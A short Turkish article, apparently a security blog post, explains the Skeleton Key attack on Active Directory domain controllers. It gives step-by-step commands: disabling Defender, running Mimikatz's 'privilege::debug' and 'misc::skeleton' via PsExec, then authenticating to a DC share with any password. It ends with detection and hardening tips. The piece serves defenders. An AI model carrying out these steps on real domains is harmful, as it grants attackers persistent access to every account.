Bu makale, kullanmakta olduğunuz sistemleri (Server/Client) güncel tutmanız ve security hardening yapmanız için yayınlanmıştır. Sistemleriniz de güvenlik açığı olduğu zaman aşağıdaki işlemler yapılabilmektedir.

Bu bilgileri yasa dışı bir faaliyet amacıyla kullanmayınız.

Skelton Key, kötü amaçlı bir kişinin herhangi bir parola kullanarak ağdaki bir Domain Controller kullanıcısı olarak kimlik doğrulaması yapmasını sağlayan ve RAM’de depolanan bir yöntemdir. Skelton Key yöntemi kullanılarak NTLM ve Kerberos protokollerinde işlem gerçekleştirilebilir. 

Bu makalede bu tür işlemlerin nasıl gerçekleştirileceğini göreceğimiz gibi, makalenin sonunda bu tür işlemlerden kendinizi korumanız için nasıl önlemler almanız gerektiğiyle ilgili bilgilerde yer almaktadır.

Bu işlemin nasıl gerçekleştirildiğini adım adım aşağıdaki şekilde görebilmekteyiz;

DC’de Microsoft Defender kapatılır ve Mimikatz kopyalanır.

Psexec ile dc de cmd çalıştırılır.

Privilege::debug

Misc::skeleton

Mimikatz’dan çıkılır ve klist komutu ile krbtgt control edilir.

net use v: \\dc1\c$ yanlışparola /user:Admin@volsys.com

Administrator kullancına yanlışparola (mimkatz) yazarak terkrar deniyorum ve maping oluşturuyorum.

ATA bu saldır için aşağıdaki alert’i üretmektedir.

NOT:

1. ATA yada Azure – ATP kullanınız.
2. PAW (high secure workstation) kullanınız.
3. Anti virüs + EDR + Malware Detection kullanınız.
4. Aduit Log’ların doğru konfigüre edildiğinden ve aktif olduğundan emin olunuz.